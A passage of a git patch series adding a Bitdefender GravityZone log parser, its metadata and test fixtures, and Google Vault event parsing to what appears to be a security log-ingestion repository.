zQ>0rzbK&O)<ZR~i8Y6xAL`YSNacPt`zMJ5CB#n1axu|9zVCT`AMJrX>+}X&aa*s8S
z<U}~VuEZvrRuDCwJOz~L_Asjfbj0DzG?vb%2efZB!Lp^V4K&K5sL^f97aZC(ZESCz
zLG;tX<QAJl%{`9z<M!7FRb5x`R1@!S9xhE^wxEZ5K)ZQv8Q$X_)GD#9GB&{dC7R9E
z;?^9}F)y3Rg8-g^<cKPJ2@zU@W*s`1?J-4}tn}r|MDakEC&P5{E@`10c_H`C<%L)J
zUzykhayiF2e(&%bU8=-^P0AD-PZgKytGT7pRx;Kr!{7Mum2z;X$XfjmC0b_xQiKJL
z_XgNLJ)C}hgu`_Ks?!o@z|0E*D^Rb!u$E)_ix2>dSBBHZZ=ny%3%1}F$6?~Wv>*_N
z0@!D122JY5=z;J_un;%NdZeOcm(`(c_*SR`)rX-KKUch8GFziklRFgR4mJ$n7x1ky
zQsIH~+a;5s8@ce!i?VJ$YNA;<{i(ke|L)}bb$K7zB_N!MjHb;anM>sGm*NMbyQ>~6
zQzbPp1Qm2lXbE80Av%wkZM|Bxv`cLKgNX*omKwxZB|rJSDx^f?<<r=%&xg!jHP*#{
zSfWbEY`b8A&=&~gQLebJh3Wbe6Mrghb*_`;e3p2Wfx62_^T`E+g)ykbxS+S}_~KHD
z?w5&+TpgVDD$!SZ___lVIpE*p6Kn`_+mQLT;}`US_s*3m3jEL@I*lc&O|Xgl)%d3E
z6kU30b8S5EXHfE$Ru5NJKiV6*c$Eq3ZLWE^JQ1o#jA9QuI%jl}2J~=`+dr(%s3Evq
z53J6a6Lu@Y^YLOAsyx!@#sQ6@y_+s8ZOsWdL_9NC6Xf4Lh*ZH4q%IkiJHSy#6;v^l
zsiuawd%p=f1b%|=u-zdae%pRA7mIk^sh3>&3ywG2J9}S|_$$>wt$Y9=#W6Df6hAyX
zsH`EL31IxGBi1f0iFOI-)xO*^PzN|VubLcjVtPa<aAXt;uiIJQSXhQT!UQ2z-2hN|
z_2tLWmf-#35if9qN7$5zFTr;jT+qWw<M_1CD7DSCrJ+^?A*{q*;H<5h3dDYFAL&Pz
z%oo=GecDXGn<MFi4aH;FUe~OphHr|u(TSjcQo#s7d>^%)H7i+{aP5O^0x6{Kk<b5q
z)=C|_f!yf|XlGfq0l(#25LFV&Hr^6<?XiJr2@tLpd9MG0QfzGylQ%Io@`D9C*zhE7
zaLotXTj;l1_3C1zCQiB0Y^(8B^nB@#rp^$=>vBO3B|=PKn3(a$;Y{Jo!^y<W2Y_kM
z4DdQ&U7Aeum705^fo7R80GOljEPyIcZ3B(*<B&~Tg!Z(>kXzmogpE{59i7=e>o#h5
z3vhsCp4L_?b#Tcsx0+}tM|pKpwDp%VX@I@`esGL*)vX=jLb!M)DYUmfy3l4oJ7g>x
zrL^^0|Bb7s<kdvy`TA~#$8m#G4b(%fe^;q6?p(2NV|27tzIJ6B>j|w%#vUtXRpoR>
zJ|s>-dggx^enkChc0-Ao^YxIi{chXsoikZ1@3zsvisIjWm;qLc-|iY0`UZLXH+73<
zxLv*whj@{j08Xd#k>n<1nH9^8b66XHmL2;ko*r+{NE9?>a=i6hI=Y(LUsUAm+WV}4
zwosPpuR%J^4yzC3tc`MnSWBqdyg6|z-k%N&?yNHcnp?_F>4V<dSvGlUH$-}WkoMIz
zeeWMqd-iPW1S-0(B_!}q#E+@fdXT?4SDnw8baLT&>nc$*U{vPlYgi?{gF*Q#*FF63
zBSLjhCZY4jIrf%EM>A-sy&^0mkMLA_raWkD$TuT$U}2vFq<X~9*aVk$yGTvcbtck+
zZ?egCKn<tOP1h(7X8VlYdakrN-@Y8ZhGB0Tj;AMv9ADmaOzv_Jov=!*fO&V~vev?*
z*u*)F<jNCj-<c=Kj7laxWnL*{3?|C>e?CFWm0^#xGDcF1aw%dj%yz`>+(8T6xz69Q
zS>v91eCSh3yZykc&opQ!AHQpjf^o?L1uCl|09y$@z;oU;@SdA1S`soD$Jy7&I{->K
z3z1P&`ibuCkbLThZTZ2A7T@=rv?S+L()D})-bpNhg+1+1wr-dW>2a0z1mn(r;81ef
z#0dAxWCwQGYa~92KG}bYA2$8LeNC6}Z?@0XB6#iwd9?No-0{u`s=3Sb=J<Gx1$`2F
zb^nXf^EW!d*2R15#a%F9uHiLWW=Bj<@O7gd**<GSkWE2^Dh_#I0oNDsW@hlaTk$uG
zA}T?))S121w`}>msEy(Of`j$04v@ry^Mqc1V%O}kOQ0>j4H3}RSnI_*AeCfndzcoa
z6!c*kv%SF}!OtU|z>!-FoP~+v&{qDIx)4W87mwd6us3nD!1lxpJ8Yw*qUez_pQMr!
z*mh6WdlVP}Ax;;4HC%Tl+V}#DOw9T)Z1@##_!Wa`@V|b=8y`a2_&(Iebl8ZB|1YCr
zt+X#e`ThE~xNE+wy2<%qT`FST_b}$vrhlS>*XAGB|JW#VWc@<fetP|Ka9_;&<)k{W
zXb0|zwup5{#M+I2JPn3nV{kTRPR#l|*jODKp<^RFf`zcLcl;mhk2`nCS_-O2%m3`w
N=<}F!g=a4R@joDI>9YU;

literal 0
HcmV?d00001

diff --git a/Bitdefender/gravityzone/_meta/manifest.yml b/Bitdefender/gravityzone/_meta/manifest.yml
new file mode 100644
index 000000000..d7f027920
--- /dev/null
+++ b/Bitdefender/gravityzone/_meta/manifest.yml
@@ -0,0 +1,11 @@
+uuid: d11df984-840d-4c29-a6dc-b9195c3a24e3
+name: Bitdefender GravityZone
+slug: gravityzone
+
+description: >-
+  Bitdefender GravityZone is an enterprise-level cybersecurity solution offering advanced threat prevention, detection, and response for endpoints, networks, and cloud environments. It features centralized management for streamlined security oversight.
+
+data_sources:
+  Authentication logs:
+  Network device logs:
+  File monitoring:
diff --git a/Bitdefender/gravityzone/_meta/smart-descriptions.json b/Bitdefender/gravityzone/_meta/smart-descriptions.json
new file mode 100644
index 000000000..6579befcb
--- /dev/null
+++ b/Bitdefender/gravityzone/_meta/smart-descriptions.json
@@ -0,0 +1,125 @@
+[
+  {
+    "value": "New file threat {threat.indicator.name} with severity {event.severity} from {source.user.name} on {threat.indicator.file.path}",
+    "conditions": [
+      {
+        "field": "threat.indicator.name"
+      },
+      {
+        "field": "event.severity"
+      },
+      {
+        "field": "source.user.name"
+      },
+      {
+        "field": "threat.indicator.file.path"
+      },
+      {
+        "field": "threat.indicator.type",
+        "value": "file"
+      }
+    ]
+  },
+  {
+    "value": "New threat {threat.indicator.name} with severity {event.severity} from {source.user.name}",
+    "conditions": [
+      {
+        "field": "threat.indicator.name"
+      },
+      {
+        "field": "event.severity"
+      },
+      {
+        "field": "source.user.name"
+      }
+    ]
+  },
+  {
+    "value": "New threat {threat.indicator.name} with severity {event.severity}",
+    "conditions": [
+      {
+        "field": "threat.indicator.name"
+      },
+      {
+        "field": "event.severity"
+      }
+    ]
+  },
+  {
+    "value": "Alert on {host.name} from {source.user.name}",
+    "conditions": [
+      {
+        "field": "event.kind",
+        "value": "alert"
+      },
+      {
+        "field": "host.name"
+      },
+      {
+        "field": "source.user.name"
+      }
+    ]
+  },
+  {
+    "value": "Alert on {host.name}",
+    "conditions": [
+      {
+        "field": "event.kind",
+        "value": "alert"
+      },
+      {
+        "field": "host.name"
+      }
+    ]
+  },
+  {
+    "value": "Action {event.action} on {host.name} from {source.user.name}",
+    "conditions": [
+      {
+        "field": "event.action"
+      },
+      {
+        "field": "host.ip"
+      },
+      {
+        "field": "source.user.name"
+      }
+    ]
+  },
+  {
+    "value": "Action {event.action} on {host.name}",
+    "conditions": [
+      {
+        "field": "event.action"
+      },
+      {
+        "field": "host.ip"
+      }
+    ]
+  },
+  {
+    "value": "{event.category} event on {host.name} from {source.user.name}",
+    "conditions": [
+      {
+        "field": "event.category"
+      },
+      {
+        "field": "host.name"
+      },
+      {
+        "field": "source.user.name"
+      }
+    ]
+  },
+  {
+    "value": "{event.category} event on {host.name}",
+    "conditions": [
+      {
+        "field": "event.category"
+      },
+      {
+        "field": "host.ip"
+      }
+    ]
+  }
+]
diff --git a/Bitdefender/gravityzone/ingest/parser.yml b/Bitdefender/gravityzone/ingest/parser.yml
new file mode 100644
index 000000000..b6af1ad11
--- /dev/null
+++ b/Bitdefender/gravityzone/ingest/parser.yml
@@ -0,0 +1,111 @@
+name: bitdefender-gravityzone
+pipeline:
+  - name: parse_event
+    external:
+      name: cef.parse-cef
+
+  - name: parsed_date
+    external:
+      name: date.parse
+      properties:
+        input_field: "{{parse_event.message.eventdate or parse_event.message.BitdefenderGZDetectionTime}}"
+        output_field: datetime
+
+  - name: set_event_fields
+  - name: set_ecs_fields
+
+stages:
+  set_event_fields:
+    actions:
+      - set:
+          event.action: "{{parse_event.message.act}}"
+          event.module: "{{parse_event.message.BitdefenderGZModule}}"
+          event.severity: "{{parse_event.message.Severity}}"
+          event.type: ["info"]
+
+      - set:
+          event.kind: "alert"
+        filter: "{{ parse_event.message.BitdefenderGZModule == 'new-incident' }}"
+
+      - set:
+          event.type: ["denied"]
+        filter: "{{ parse_event.message.BitdefenderGZModule == 'aph' }}"
+
+      - set:
+          event.type: ["start"]
+        filter: "{{ parse_event.message.Name == 'Login from new device' }}"
+
+      - translate:
+        dictionary:
+          Exchange Malware Detected: ["malware"]
+          Invalid Exchange user credentials: ["intrusion_detection"]
+          Sandbox Analyzer Detection: ["malware"]
+          Storage Antimalware Event: ["malware"]
+          Login from new device: ["authentication"]
+          Authentication audit: ["authentication"]
+          SMTP Connection: ["network"]
+          Internet Connection: ["network"]
+          Malware Outbreak: ["malware"]
+        mapping:
+          parse_event.message.Name: event.category
+        filter: "{{parse_event.message.Name != None}}"
+
+      - translate:
+        dictionary:
+          "aph": ["network"]
+          "application-control": ["process"]
+          "application-inventory": ["package"]
+          "av": ["malware"]
+          "avc": ["malware"]
+          "dp": ["intrusion_detection"]
+          "exchange-user-credentials": ["intrusion_detection"]
+          "fw": ["network"]
+          "hd": ["malware"]
+          "antiexploit": ["intrusion_detection"]
+          "network-monitor": ["intrusion_detection"]
+          "registration": ["host"]
+          "device-control": ["host"]
+          "ransomware-mitigation": ["intrusion_detection"]
+          "new-incident": ["process"]
+        mapping:
+          parse_event.message.BitdefenderGZModule: event.category
+        filter: "{{parse_event.message.BitdefenderGZModule != None}}"
+
+  set_ecs_fields:
+    actions:
+      - set:
+          "@timestamp": "{{parsed_date.datetime}}"
+          host.ip: "{{parse_event.message.dvc}}"
+          host.name: "{{parse_event.message.BitdefenderGZComputerFQDN or parse_event.message.dvchost}}"
+          destination.user.name: "{{parse_event.message.duser}}"
+          source.user.name: "{{parse_event.message.suser}}"
+          source.user.id: "{{parse_event.message.suid}}"
+          url.original: "{{parse_event.message.request}}"
+          rule.name: "{{parse_event.message.BitdefenderGZBlockingRuleName}}"
+          organization.id: "{{parse_event.message.BitdefenderGZCompanyId}}"
+          host.id: "{{parse_event.message.BitdefenderGZEndpointId}}"
+          email.subject: "{{parse_event.message.BitdefenderGZEmailSubject}}"
+          email.sender.address: "{{parse_event.message.BitdefenderGZEmailSender}}"
+          source.ip: "{{parse_event.message.BitdefenderGZEventSourceIP}}"
+          process.parent.name: "{{parse_event.message.BitdefenderGZParentProcess}}"
+          process.parent.path: "{{parse_event.message.BitdefenderGZParentProcessPath}}"
+          threat.indicator.name: "{{parse_event.message.BitdefenderGZThreatName}}"
+          threat.indicator.file.hash.sha256: "{{parse_event.message.BitdefenderGZMalwareHash}}"
+          observer.vendor: "{{parse_event.message.DeviceVendor}}"
+          observer.product: "{{parse_event.message.DeviceProduct}}"
+          observer.version: "{{parse_event.message.DeviceVersion}}"
+          bitdefender.gravityzone.exploit.type: "{{parse_event.message.BitdefenderGZExploitType}}"
+
+      - set:
+          file.path: "{{parse_event.message.filePath}}"
+        filter: "{{parse_event.message.get('BitdefenderGZMalwareType') == None or parse_event.message.BitdefenderGZMalwareType.lower() != 'file'}}"
+
+      - set:
+          threat.indicator.name: "{{parse_event.message.BitdefenderGZMalwareName}}"
+          threat.indicator.type: "file"
+        filter: "{{parse_event.message.get('BitdefenderGZMalwareName') != None}}"
+
+      - set:
+          threat.indicator.file.path: "{{parse_event.message.filePath}}"
+          threat.indicator.file.name: "{{parse_event.message.filePath | basename}}"
+        filter: "{{parse_event.message.get('BitdefenderGZMalwareType', '').lower() == 'file'}}"
diff --git a/Bitdefender/gravityzone/tests/antimalware_1.json b/Bitdefender/gravityzone/tests/antimalware_1.json
new file mode 100644
index 000000000..be17a226e
--- /dev/null
+++ b/Bitdefender/gravityzone/tests/antimalware_1.json
@@ -0,0 +1,56 @@
+{
+  "input": {
+    "message": "CEF:0|Bitdefender|GravityZone|6.50.0-27|10|AntiMalware|9|BitdefenderGZModule=av BitdefenderGZCompanyId=8646b1be9aae4aefb3b23147 dvchost=Desktop-JDO BitdefenderGZComputerFQDN=desktop-jdo.example.org dvc=10.0.0.4 deviceExternalId=3ee2931202f745f98c164015 BitdefenderGZMalwareType=file BitdefenderGZMalwareName=EICAR-Test-File (not a virus) act=blocked filePath=C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Downloads\\\\\\\\b93ef2d1-160c-4bd9-9cbb-cb59ca59939e.tmp BitdefenderGZDetectionTime=2024-05-15T09:06:52.000Z BitdefenderGZSignaturesNumber=7.96749 BitdefenderGZScanEngineType=2 BitdefenderGZCleanedMalwareCnt=0 BitdefenderGZBlockedMalwareCnt=1 BitdefenderGZDeletedMalwareCnt=0 BitdefenderGZQuarantinedMalwareCnt=0 BitdefenderGZIgnoredMalwareCnt=0 BitdefenderGZPresentMalwareCnt=0 suser=jdoe suid=S-1-5-21-1111111111-222222222-3333333333-500"
+  },
+  "expected": {
+    "message": "CEF:0|Bitdefender|GravityZone|6.50.0-27|10|AntiMalware|9|BitdefenderGZModule=av BitdefenderGZCompanyId=8646b1be9aae4aefb3b23147 dvchost=Desktop-JDO BitdefenderGZComputerFQDN=desktop-jdo.example.org dvc=10.0.0.4 deviceExternalId=3ee2931202f745f98c164015 BitdefenderGZMalwareType=file BitdefenderGZMalwareName=EICAR-Test-File (not a virus) act=blocked filePath=C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Downloads\\\\\\\\b93ef2d1-160c-4bd9-9cbb-cb59ca59939e.tmp BitdefenderGZDetectionTime=2024-05-15T09:06:52.000Z BitdefenderGZSignaturesNumber=7.96749 BitdefenderGZScanEngineType=2 BitdefenderGZCleanedMalwareCnt=0 BitdefenderGZBlockedMalwareCnt=1 BitdefenderGZDeletedMalwareCnt=0 BitdefenderGZQuarantinedMalwareCnt=0 BitdefenderGZIgnoredMalwareCnt=0 BitdefenderGZPresentMalwareCnt=0 suser=jdoe suid=S-1-5-21-1111111111-222222222-3333333333-500",
+    "event": {
+      "action": "blocked",
+      "category": [
+        "malware"
+      ],
+      "module": "av",
+      "severity": 9,
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-05-15T09:06:52Z",
+    "host": {
+      "ip": "10.0.0.4",
+      "name": "desktop-jdo.example.org"
+    },
+    "observer": {
+      "product": "GravityZone",
+      "vendor": "Bitdefender",
+      "version": "6.50.0-27"
+    },
+    "organization": {
+      "id": "8646b1be9aae4aefb3b23147"
+    },
+    "related": {
+      "ip": [
+        "10.0.0.4"
+      ],
+      "user": [
+        "jdoe"
+      ]
+    },
+    "source": {
+      "user": {
+        "id": "S-1-5-21-1111111111-222222222-3333333333-500",
+        "name": "jdoe"
+      }
+    },
+    "threat": {
+      "indicator": {
+        "file": {
+          "name": "b93ef2d1-160c-4bd9-9cbb-cb59ca59939e.tmp",
+          "path": "C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Downloads\\\\\\\\b93ef2d1-160c-4bd9-9cbb-cb59ca59939e.tmp"
+        },
+        "name": "EICAR-Test-File (not a virus)",
+        "type": "file"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/Bitdefender/gravityzone/tests/antimalware_2.json b/Bitdefender/gravityzone/tests/antimalware_2.json
new file mode 100644
index 000000000..3f29dcbd2
--- /dev/null
+++ b/Bitdefender/gravityzone/tests/antimalware_2.json
@@ -0,0 +1,59 @@
+{
+  "input": {
+    "message": "CEF:0|Bitdefender|GravityZone|6.50.0-27|10|AntiMalware|9|BitdefenderGZModule=av BitdefenderGZCompanyId=8646b1be9aae4aefb3b23147 dvchost=Desktop-JDO BitdefenderGZComputerFQDN=desktop-jdo.example.org dvc=10.0.0.4 deviceExternalId=3ee2931202f745f98c164015 BitdefenderGZMalwareType=file BitdefenderGZMalwareName=EICAR-Test-File (not a virus) BitdefenderGZMalwareHash=275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f act=blocked filePath=C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Downloads\\\\\\\\b93ef2d1-160c-4bd9-9cbb-cb59ca59939e.tmp BitdefenderGZDetectionTime=2024-05-15T09:06:53.000Z BitdefenderGZSignaturesNumber=7.96749 BitdefenderGZScanEngineType=2 BitdefenderGZCleanedMalwareCnt=0 BitdefenderGZBlockedMalwareCnt=1 BitdefenderGZDeletedMalwareCnt=0 BitdefenderGZQuarantinedMalwareCnt=0 BitdefenderGZIgnoredMalwareCnt=0 BitdefenderGZPresentMalwareCnt=0 suser=jdoe suid=S-1-5-21-1111111111-222222222-3333333333-500"
+  },
+  "expected": {
+    "message": "CEF:0|Bitdefender|GravityZone|6.50.0-27|10|AntiMalware|9|BitdefenderGZModule=av BitdefenderGZCompanyId=8646b1be9aae4aefb3b23147 dvchost=Desktop-JDO BitdefenderGZComputerFQDN=desktop-jdo.example.org dvc=10.0.0.4 deviceExternalId=3ee2931202f745f98c164015 BitdefenderGZMalwareType=file BitdefenderGZMalwareName=EICAR-Test-File (not a virus) BitdefenderGZMalwareHash=275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f act=blocked filePath=C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Downloads\\\\\\\\b93ef2d1-160c-4bd9-9cbb-cb59ca59939e.tmp BitdefenderGZDetectionTime=2024-05-15T09:06:53.000Z BitdefenderGZSignaturesNumber=7.96749 BitdefenderGZScanEngineType=2 BitdefenderGZCleanedMalwareCnt=0 BitdefenderGZBlockedMalwareCnt=1 BitdefenderGZDeletedMalwareCnt=0 BitdefenderGZQuarantinedMalwareCnt=0 BitdefenderGZIgnoredMalwareCnt=0 BitdefenderGZPresentMalwareCnt=0 suser=jdoe suid=S-1-5-21-1111111111-222222222-3333333333-500",
+    "event": {
+      "action": "blocked",
+      "category": [
+        "malware"
+      ],
+      "module": "av",
+      "severity": 9,
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-05-15T09:06:53Z",
+    "host": {
+      "ip": "10.0.0.4",
+      "name": "desktop-jdo.example.org"
+    },
+    "observer": {
+      "product": "GravityZone",
+      "vendor": "Bitdefender",
+      "version": "6.50.0-27"
+    },
+    "organization": {
+      "id": "8646b1be9aae4aefb3b23147"
+    },
+    "related": {
+      "ip": [
+        "10.0.0.4"
+      ],
+      "user": [
+        "jdoe"
+      ]
+    },
+    "source": {
+      "user": {
+        "id": "S-1-5-21-1111111111-222222222-3333333333-500",
+        "name": "jdoe"
+      }
+    },
+    "threat": {
+      "indicator": {
+        "file": {
+          "hash": {
+            "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f"
+          },
+          "name": "b93ef2d1-160c-4bd9-9cbb-cb59ca59939e.tmp",
+          "path": "C:\\\\\\\\Users\\\\\\\\jdoe\\\\\\\\Downloads\\\\\\\\b93ef2d1-160c-4bd9-9cbb-cb59ca59939e.tmp"
+        },
+        "name": "EICAR-Test-File (not a virus)",
+        "type": "file"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/Bitdefender/gravityzone/tests/login_1.json b/Bitdefender/gravityzone/tests/login_1.json
new file mode 100644
index 000000000..ddf96c93f
--- /dev/null
+++ b/Bitdefender/gravityzone/tests/login_1.json
@@ -0,0 +1,35 @@
+{
+  "input": {
+    "message": "CEF:0|Bitdefender|GZ|6.50.0-27|6|Login from new device|3|start=Jun 11 2024 12:34:56+01:00 BitdefenderGZCompanyName=example suser=jdoe BitdefenderGZLoginOS=Win11 BitdefenderGZAuthenticationBrowserName=Chrome BitdefenderGZAuthenticationBrowserVersion=129.0.6668.70 dvchost=1.2.3.4"
+  },
+  "expected": {
+    "message": "CEF:0|Bitdefender|GZ|6.50.0-27|6|Login from new device|3|start=Jun 11 2024 12:34:56+01:00 BitdefenderGZCompanyName=example suser=jdoe BitdefenderGZLoginOS=Win11 BitdefenderGZAuthenticationBrowserName=Chrome BitdefenderGZAuthenticationBrowserVersion=129.0.6668.70 dvchost=1.2.3.4",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "severity": 3,
+      "type": [
+        "start"
+      ]
+    },
+    "host": {
+      "name": "1.2.3.4"
+    },
+    "observer": {
+      "product": "GZ",
+      "vendor": "Bitdefender",
+      "version": "6.50.0-27"
+    },
+    "related": {
+      "user": [
+        "jdoe"
+      ]
+    },
+    "source": {
+      "user": {
+        "name": "jdoe"
+      }
+    }
+  }
+}
\ No newline at end of file

From dc2ecb405350919b0d9e494cccc2caa13eac0b1c Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Tue, 22 Oct 2024 13:16:13 +0300
Subject: [PATCH 165/317] Apply linter

---
 Bitdefender/gravityzone/_meta/fields.yml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Bitdefender/gravityzone/_meta/fields.yml b/Bitdefender/gravityzone/_meta/fields.yml
index 57f24a53a..52fd0cc6a 100644
--- a/Bitdefender/gravityzone/_meta/fields.yml
+++ b/Bitdefender/gravityzone/_meta/fields.yml
@@ -1,9 +1,9 @@
 bitdefender.gravityzone.exploit.type:
-  description: 'Exploit type detected by Bitdefender GravityZone.'
+  description: Exploit type detected by Bitdefender GravityZone.
   name: bitdefender.gravityzone.exploit.type
   type: keyword
 
 process.parent.path:
-  description: 'Path of the parent process.'
+  description: Path of the parent process.
   name: process.parent.path
   type: keyword

From 997a03cb9d084e0d78358ae0cb1b5e3870e90446 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 23 Oct 2024 11:04:55 +0200
Subject: [PATCH 166/317] fix(Bitdefender): add beta flag

---
 Bitdefender/gravityzone/_meta/manifest.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/Bitdefender/gravityzone/_meta/manifest.yml b/Bitdefender/gravityzone/_meta/manifest.yml
index d7f027920..51df52c6b 100644
--- a/Bitdefender/gravityzone/_meta/manifest.yml
+++ b/Bitdefender/gravityzone/_meta/manifest.yml
@@ -1,5 +1,5 @@
 uuid: d11df984-840d-4c29-a6dc-b9195c3a24e3
-name: Bitdefender GravityZone
+name: Bitdefender GravityZone [BETA]
 slug: gravityzone
 
 description: >-

From 42bd3e8e3e124d1a689e589b7a03d72f5da1d768 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Fri, 25 Oct 2024 12:06:55 +0200
Subject: [PATCH 167/317] Add some improvements to the parser

---
 .../_meta/smart-descriptions.json             | 37 +++++++++-----
 Google Cloud/google-report/ingest/parser.yml  | 20 ++++++++
 .../tests/test_vault_service.json             | 48 +++++++++++++++++++
 3 files changed, 94 insertions(+), 11 deletions(-)
 create mode 100644 Google Cloud/google-report/tests/test_vault_service.json

diff --git a/Google Cloud/google-report/_meta/smart-descriptions.json b/Google Cloud/google-report/_meta/smart-descriptions.json
index 17ce57463..6a934ee3d 100644
--- a/Google Cloud/google-report/_meta/smart-descriptions.json	
+++ b/Google Cloud/google-report/_meta/smart-descriptions.json	
@@ -65,6 +65,28 @@
       }
     ]
   },
+  {
+    "value": "User {user.email} view the document {file.name} in {network.application}",
+    "conditions": [
+      {
+        "field": "event.category",
+        "value": "file"
+      },
+      {
+        "field": "event.type",
+        "value": "access"
+      },
+      {
+        "field": "user.email"
+      },
+      {
+        "field": "file.name"
+      },
+      {
+        "field": "network.application"
+      }
+    ]
+  },
   {
     "value": "User {user.email} give access to {client.user.id} for {google.report.token.app_name} application",
     "conditions": [
@@ -132,24 +154,17 @@
     ]
   },
   {
-    "value": "User {user.email} view the document {file.name} in {network.application}",
+    "value": "User {user.email} have {event.action} on {network.application} application",
     "conditions": [
       {
-        "field": "event.category",
-        "value": "file"
-      },
-      {
-        "field": "event.type",
-        "value": "access"
+        "field": "network.application",
+        "value": "vault"
       },
       {
         "field": "user.email"
       },
       {
-        "field": "file.name"
-      },
-      {
-        "field": "network.application"
+        "field": "event.action"
       }
     ]
   },
diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml
index 1a14d7a07..363bfd6b5 100644
--- a/Google Cloud/google-report/ingest/parser.yml	
+++ b/Google Cloud/google-report/ingest/parser.yml	
@@ -26,6 +26,8 @@ pipeline:
     filter: '{{ json_event.message.id.applicationName == "calendar"}}'
   - name: set_admin_fields
     filter: '{{ json_event.message.id.applicationName == "admin"}}'
+  - name: set_vault_fields
+    filter: '{{ json_event.message.id.applicationName == "vault"}}'
   - name: set_parameters_fields
     filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}'
 
@@ -238,3 +240,21 @@ stages:
           event.type: ["change"]
           google.report.parameters.name: "{{json_event.message.events[0].parameters[0].name}}"
           google.report.parameters.value: "{{json_event.message.events[0].parameters[0].value}}"
+
+  set_vault_fields:
+    actions:
+      - set:
+          event.type: >
+            {% set types = [] %}
+            {% for event in json_event.message.events %}
+                {%- if ("delete" in event.name) or ("remove" in event.name) -%}
+                    {% set _ = types.append("deletion") %}
+                {%- elif ("create" in event.name) -%}
+                    {% set _ = types.append("creation") %}
+                {%- elif ("view" in event.name) -%}
+                    {% set _ = types.append("access") %}
+                {%- else -%}
+                    {% set _ = types.append("change") %}
+                {%- endif -%}
+            {% endfor %}
+            {{ types|unique|list }}
\ No newline at end of file
diff --git a/Google Cloud/google-report/tests/test_vault_service.json b/Google Cloud/google-report/tests/test_vault_service.json
new file mode 100644
index 000000000..cfe26e3f4
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_vault_service.json	
@@ -0,0 +1,48 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Google Report",
+        "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd"
+      }
+    },
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-10-24T12:15:09.887Z\",\"uniqueQualifier\":\"38392508037850000000\",\"applicationName\":\"vault\",\"customerId\":\"C020000000\"},\"etag\":\"\\\"v9u8pSCZPl3C66fdSWYRyXweF216RQ7SWqFaenjlgO0/aMkDQ5g3000000000000000000000\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"joe.done@test.cloud\",\"profileId\":\"10055276727227777777777\"},\"events\":[{\"type\":\"user_action\",\"name\":\"view_cross_matter_litigation_hold_report\"}]}"
+  },
+  "expected": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-10-24T12:15:09.887Z\",\"uniqueQualifier\":\"38392508037850000000\",\"applicationName\":\"vault\",\"customerId\":\"C020000000\"},\"etag\":\"\\\"v9u8pSCZPl3C66fdSWYRyXweF216RQ7SWqFaenjlgO0/aMkDQ5g3000000000000000000000\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"joe.done@test.cloud\",\"profileId\":\"10055276727227777777777\"},\"events\":[{\"type\":\"user_action\",\"name\":\"view_cross_matter_litigation_hold_report\"}]}",
+    "event": {
+      "action": "view_cross_matter_litigation_hold_report",
+      "dataset": "admin#reports#activity",
+      "type": [
+        "access"
+      ]
+    },
+    "@timestamp": "2024-10-24T12:15:09.887000Z",
+    "cloud": {
+      "account": {
+        "id": "C020000000"
+      }
+    },
+    "google": {
+      "report": {
+        "actor": {
+          "email": "joe.done@test.cloud"
+        }
+      }
+    },
+    "network": {
+      "application": "vault"
+    },
+    "related": {
+      "user": [
+        "joe.done"
+      ]
+    },
+    "user": {
+      "domain": "test.cloud",
+      "email": "joe.done@test.cloud",
+      "id": "10055276727227777777777",
+      "name": "joe.done"
+    }
+  }
+}
\ No newline at end of file

From 6377e1bb11d4ce4ce5496e13b9682eaa8dff2ab2 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Fri, 25 Oct 2024 12:15:23 +0200
Subject: [PATCH 168/317] Apply linter

---
 Google Cloud/google-report/tests/test_vault_service.json | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/Google Cloud/google-report/tests/test_vault_service.json b/Google Cloud/google-report/tests/test_vault_service.json
index cfe26e3f4..1c9dab4ca 100644
--- a/Google Cloud/google-report/tests/test_vault_service.json	
+++ b/Google Cloud/google-report/tests/test_vault_service.json	
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-10-24T12:15:09.887Z\",\"uniqueQualifier\":\"38392508037850000000\",\"applicationName\":\"vault\",\"customerId\":\"C020000000\"},\"etag\":\"\\\"v9u8pSCZPl3C66fdSWYRyXweF216RQ7SWqFaenjlgO0/aMkDQ5g3000000000000000000000\\\"\",\"actor\":{\"callerType\":\"USER\",\"email\":\"joe.done@test.cloud\",\"profileId\":\"10055276727227777777777\"},\"events\":[{\"type\":\"user_action\",\"name\":\"view_cross_matter_litigation_hold_report\"}]}",
     "sekoiaio": {
       "intake": {
         "dialect": "Google Report",
         "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd"
       }
-    },
